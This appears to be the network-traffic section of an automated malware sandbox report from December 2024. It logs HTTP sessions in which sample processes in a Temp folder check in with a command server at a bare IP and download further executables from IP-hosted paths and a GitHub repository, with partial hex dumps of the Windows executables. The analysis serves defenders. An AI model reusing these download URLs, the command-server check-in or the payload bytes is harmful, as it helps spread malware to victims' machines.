                                                                                                                                                                                                                                        ETag: "67614868-bae80"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955812931 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955828905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955898046 CET1236INData Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe
                                                                                                                                                                                                                                        Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955914021 CET1236INData Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44
                                                                                                                                                                                                                                        Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w|$ D$$WUS`K
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955981016 CET1236INData Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f
                                                                                                                                                                                                                                        Data Ascii: RWhABV?VD$t$p0A^WV|$(AA1NNOPQEAGONFA^_WV|$(AA1NNOPQDAGONF\A^_WV|$(AA1NNOPQDAG
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.955996990 CET896INData Raw: 89 43 0c 89 7b 1c 8b 4d cc 89 4b 20 47 57 ff 75 c8 50 e8 30 57 00 00 83 c4 0c 8b 45 08 89 43 04 8b 45 0c 89 43 08 8d 7d d8 89 3b e8 9f 00 00 00 83 c4 24 8b 65 c4 83 7f 14 10 72 03 8b 7d d8 c7 06 28 c1 41 00 8d 46 04 31 c9 89 4e 08 89 4e 04 8d 4d
                                                                                                                                                                                                                                        Data Ascii: C{MK GWuP0WECEC};$er}(AF1NNM9APQ>@AEr,MxrQ) s>$WQAEFEFM1e^_[]USWV|$0WB1D$t$<~t
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956093073 CET1236INData Raw: c2 c1 e2 02 eb 05 ba 04 00 00 00 8b 06 8b 48 04 0b 54 0e 0c 31 c0 83 7c 0e 38 00 8d 0c 0e 0f 94 c0 c1 e0 02 09 d0 6a 00 50 e8 0f f7 ff ff 89 e1 e8 62 f6 ff ff 8b 4c 24 08 31 e1 e8 0d 06 00 00 89 f0 83 c4 0c 5e 5f c2 04 00 cc 53 57 56 83 ec 0c 0f
                                                                                                                                                                                                                                        Data Ascii: HT1|8jPbL$1^_SWVt$WB1D$A0HOPW;VR OtPtjL$1^_[SWVt$WB1D$L$j|dB$eBdPu3
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956131935 CET1236INData Raw: 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 37 38 00 00 83 c4 08 c7 06 c8 c5 41 00 89 f0 5e c2 04 00 cc c7 01 28 c1 41 00 83 c1 04 51 e8 7b 38 00 00 83 c4 04 c3 b8 80 64 42 00 c3 b9 b8 64 42 00 e8 96 04 00 00 68 4c b8 41 00 e8 ec 01 00 00 59 c3
                                                                                                                                                                                                                                        Data Ascii: 1VVQP78A^(AQ{8dBdBhLAYhVAYh`AYeBhhjAYVWj3^YfBjVfBAihtAY_^jjhfBeBh~AeYeBiBhA
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:01.956165075 CET1236INData Raw: 50 e8 df 24 00 00 59 c3 33 c0 57 8b f9 40 f0 0f c1 05 0c 58 42 00 75 19 56 be c0 64 42 00 56 e8 90 24 00 00 83 c6 18 59 81 fe 80 65 42 00 75 ee 5e 8b c7 5f c3 83 c8 ff f0 0f c1 05 0c 58 42 00 79 19 56 be c0 64 42 00 56 e8 7b 24 00 00 83 c6 18 59
                                                                                                                                                                                                                                        Data Ascii: P$Y3W@XBuVdBV$YeBu^_XByVdBV{$YeBu^UQjYteBEAeBVWyp7Btj17B_^VeBV0Y5eBu^UVjjuYY
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.075294971 CET1236INData Raw: 0c 8d 4d f4 ff 75 08 e8 91 00 00 00 68 04 43 42 00 8d 45 f4 50 e8 ab 28 00 00 cc 55 8b ec 56 ff 75 08 8b f1 e8 fa e6 ff ff c7 06 54 cb 41 00 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 28 c1 41 00 50 e8 ba 2e 00 00 f6 45 08 01 59 74 0a
                                                                                                                                                                                                                                        Data Ascii: MuhCBEP(UVuTA^]UVF(AP.EYtjV8YY^]UQVuu`A^UVu`A^]UQVuuA^aaAB$AUEM#P+w]


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        13192.168.2.449908185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:05.917889118 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 37 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1017354001&unit=246122658369
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.266859055 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        14192.168.2.44991031.41.244.11807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:07.854460955 CET61OUTGET /files/x3team/random.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176038027 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3286016
                                                                                                                                                                                                                                        Last-Modified: Wed, 18 Dec 2024 13:43:08 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "6762d16c-322400"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 cf 56 f4 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c8 2f 00 00 5a 02 00 00 00 00 00 ce e6 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 32 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 80 e6 2f 00 4b 00 00 00 00 00 30 00 40 57 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 32 00 0c 00 00 00 33 e6 2f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVP/Z/ 0@ 2@/K0@W`23/ H.text/ / `.rsrc@W0X/@@.reloc`2"2@B/H@C@z*6+(B99(*:+(^A(!**(*****(**0(*8yEcO/8^s :&8s8s 9& 8s 8*s80*0*0*0*0***0*0**
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176081896 CET1236INData Raw: 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 22 00 14 a5 2e 00 00 01 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00
                                                                                                                                                                                                                                        Data Ascii: 0**".******(**~(*s;(=t8**0****0***(**0*0*0
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176136017 CET1236INData Raw: 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a
                                                                                                                                                                                                                                        Data Ascii: *******************************
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176170111 CET1236INData Raw: 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12
                                                                                                                                                                                                                                        Data Ascii: 0****(**(***0******(*****"r*******(****0
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176227093 CET896INData Raw: 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a
                                                                                                                                                                                                                                        Data Ascii: ***********0*e**********"r*****
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176264048 CET1236INData Raw: 2a 41 1c 00 00 02 00 00 00 34 00 00 00 83 01 00 00 b7 01 00 00 0d 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00 00 02 00 30 00 14 44 00 40 00 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a
                                                                                                                                                                                                                                        Data Ascii: *A40*0D@***"***"***"**"r***"****"*"r
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176316023 CET1236INData Raw: 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12
                                                                                                                                                                                                                                        Data Ascii: *0****(**0*0****(**0*0*"-**0*ALB*
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176350117 CET1236INData Raw: 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a
                                                                                                                                                                                                                                        Data Ascii: *0****(******"***(***0*0*0*4O70*^}
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176387072 CET1236INData Raw: 00 3b 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 77 01 00 00 b2 02 00 00 29 04 00 00 13 00 00 00 00 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: ;0*Aw)0*0**0X(* 8Eq8 :&8*~: 9& 8~ 8
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.176424026 CET1236INData Raw: 3a ab ff ff ff 26 20 00 00 00 00 38 a0 ff ff ff 7e f9 00 00 04 80 f6 00 00 04 20 01 00 00 00 17 3a 8b ff ff ff 26 38 81 ff ff ff 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a
                                                                                                                                                                                                                                        Data Ascii: :& 8~ :&80*******0*0********0*0*0
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.296117067 CET1236INData Raw: 00 00 00 fe 0c 00 00 45 02 00 00 00 37 00 00 00 36 00 00 00 38 32 00 00 00 7e 40 01 00 04 3a 28 00 00 00 38 00 00 00 00 14 fe 06 2c 04 00 06 73 56 04 00 06 80 40 01 00 04 20 00 00 00 00 16 39 c3 ff ff ff 26 38 b9 ff ff ff 2a 7e 40 01 00 04 80 3d
                                                                                                                                                                                                                                        Data Ascii: E7682~@:(8,sV@ 9&8*~@= 9&8*********0(* 8E@A%8;~EB


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.44986720.233.83.1454437320C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:09:53 UTC117OUTGET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: github.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-19 05:09:54 UTC568INHTTP/1.1 302 Found
                                                                                                                                                                                                                                        Server: GitHub.com
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                        Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                        2024-12-19 05:09:54 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.449875185.199.111.1334437320C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:09:55 UTC128OUTGET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 1275904
                                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        ETag: "f6e395433fd455488d8d231a7e135bc540ae3f4d4024c956534b849ab403e860"
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 5AB8:37C109:25CDF3:2B35F0:6763AAA2
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:55 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740076-EWR
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1734584996.877572,VS0,VE96
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 8584c5dcd5bede92958032c8a464da1d6b124f74
                                                                                                                                                                                                                                        Expires: Thu, 19 Dec 2024 05:14:55 GMT
                                                                                                                                                                                                                                        Source-Age: 0
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 ec 03 00 00 ac 00 00 00 00 00 00 f7 78 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 50 2d 00 14 02 00
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gx@;@ P-
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 0e 7f 54 d0 cc 87 8b 5f c6 42 59 ee 49 48 fd cb 31 5a 82 d1 c3 d1 61 9b 5e fd 57 db b5 b5 3e 51 67 3b 63 af 11 89 31 1a d4 8b 30 57 33 eb 43 43 55 52 38 e5 c0 b6 d6 b0 63 62 2f 79 94 1a 5e cd f2 ad bd e1 46 7c 66 5c 7a 31 d1 ec dd a3 d0 59 5a 9f 30 3a d4 e6 44 00 91 39 74 0d 99 51 63 9f cc 9c 97 3b f9 ac 97 9e a7 ca d2 eb 15 06 c6 ec 0b 1e 17 48 a8 63 4e c6 12 ba 90 93 2c 12 d4 60 e7 30 25 88 e3 c5 af 0b cf f9 9a cc b8 c5 01 11 0c 2d a2 23 67 22 ae fd 24 1e 22 09 af b9 11 d9 5a c1 d6 49 52 12 f8 5f 8f 3c ff 3b f7 2d 2c 05 47 96 1a 12 16 70 77 7a 70 f0 1a 01 69 13 c8 14 ab e9 86 13 f7 89 f8 82 34 08 51 9d 20 75 f4 ff 41 f5 60 19 d3 4b 0f 23 84 dd 8a 6c 32 8d 7b 77 55 43 8e a4 a1 bb 9a 1a 24 ae d3 81 76 6f 95 35 dc 6c 55 4a f1 81 d5 4d d9 84 ac 87 69 f4 e5
                                                                                                                                                                                                                                        Data Ascii: T_BYIH1Za^W>Qg;c10W3CCUR8cb/y^F|f\z1YZ0:D9tQc;HcN,`0%-#g"$"ZIR_<;-,Gpwzpi4Q uA`K#l2{wUC$vo5lUJMi
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 9d e9 c8 ac a2 4e 78 1f 42 08 1d dd 91 fb e3 c4 d3 53 70 95 d8 12 55 99 4d d4 5a 23 46 b1 1f 5a 91 5f a3 af 50 e5 26 cb 28 18 67 eb 6f 3e 0a 95 e8 c2 9d 99 43 e7 53 1b 05 00 3f 0a ba 73 e3 b7 09 81 eb 04 48 7e 49 67 aa 91 73 7f c7 31 36 f1 2b b3 03 b6 7f 5e db 8e a4 13 e3 ed 8d 45 99 30 89 56 fa 11 dd 91 37 75 73 5c fe 7d 7c 9b 89 d5 a5 70 e5 01 37 56 22 a0 b1 63 5e 42 af 07 ac de 33 9d 7a 20 8e 8d 06 6f c9 75 94 3c b4 5b 4a 6a a5 54 95 f6 18 af a0 5b 6a 58 3a d2 81 26 92 ee 17 7a 24 fe ee 41 22 31 80 ff df c8 a8 cb c5 9e e9 4f 60 4a 2b 75 e6 44 1b 86 ac 35 53 46 ce bd 29 49 5f 09 e4 89 17 b8 86 90 44 de 65 35 64 cb dc d3 85 46 40 49 55 96 da 32 4a e3 91 48 16 80 69 05 54 20 47 88 f4 e1 2e 1f ff 11 6d 87 93 62 b9 a2 12 95 ee 55 17 0a f8 2f 9a 2c 46 66 a0
                                                                                                                                                                                                                                        Data Ascii: NxBSpUMZ#FZ_P&(go>CS?sH~Igs16+^E0V7us\}|p7V"c^B3z ou<[JjT[jX:&z$A"1O`J+uD5SF)I_De5dF@IU2JHiT G.mbU/,Ff
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: f1 78 84 3d 8c 25 5e d0 c4 01 d9 92 bb 7f bc 61 9a 73 82 68 6d f7 c4 36 2a 68 69 f9 9d fc 06 cd 2d 8e 9b 32 53 16 82 88 01 ee 97 fb 71 1d 50 af 95 ac 96 80 0b bb b2 76 df 70 11 73 bd 31 04 52 b6 bf 0e aa b1 b1 2c eb 54 2b 15 c6 45 a9 73 42 88 44 30 f1 3d 77 40 ce 07 c7 7f dc e9 98 8f 55 74 ca ca e5 17 e5 8e bf 5f 91 a4 3b ed d2 b8 50 05 f0 8a ac 75 80 ec 18 2a bc 87 b5 50 94 84 43 54 a1 65 f6 a2 34 b0 63 58 59 98 a8 d1 93 c3 c8 c1 87 9c 54 9b 46 dc 02 49 7a 1d 85 00 be d3 45 82 02 cc 71 e6 0c 91 2c d4 93 4a d3 54 9c ba 68 d8 48 74 f0 4c 08 98 03 7d 59 de 02 c1 1e d2 cf ca ad b0 7f 8f c3 dc bd c2 b9 93 9a ee 98 bc da ee 8c 05 61 d9 7e b7 ac ea bd f5 b2 ba 81 2a 96 5b d4 02 53 aa b5 e8 0e f5 31 a6 2d 26 36 c3 c3 2f 38 32 d9 46 34 4a da 7c a3 ad 41 7d 0e 29
                                                                                                                                                                                                                                        Data Ascii: x=%^ashm6*hi-2SqPvps1R,T+EsBD0=w@Ut_;Pu*PCTe4cXYTFIzEq,JThHtL}Ya~*[S1-&6/82F4J|A})
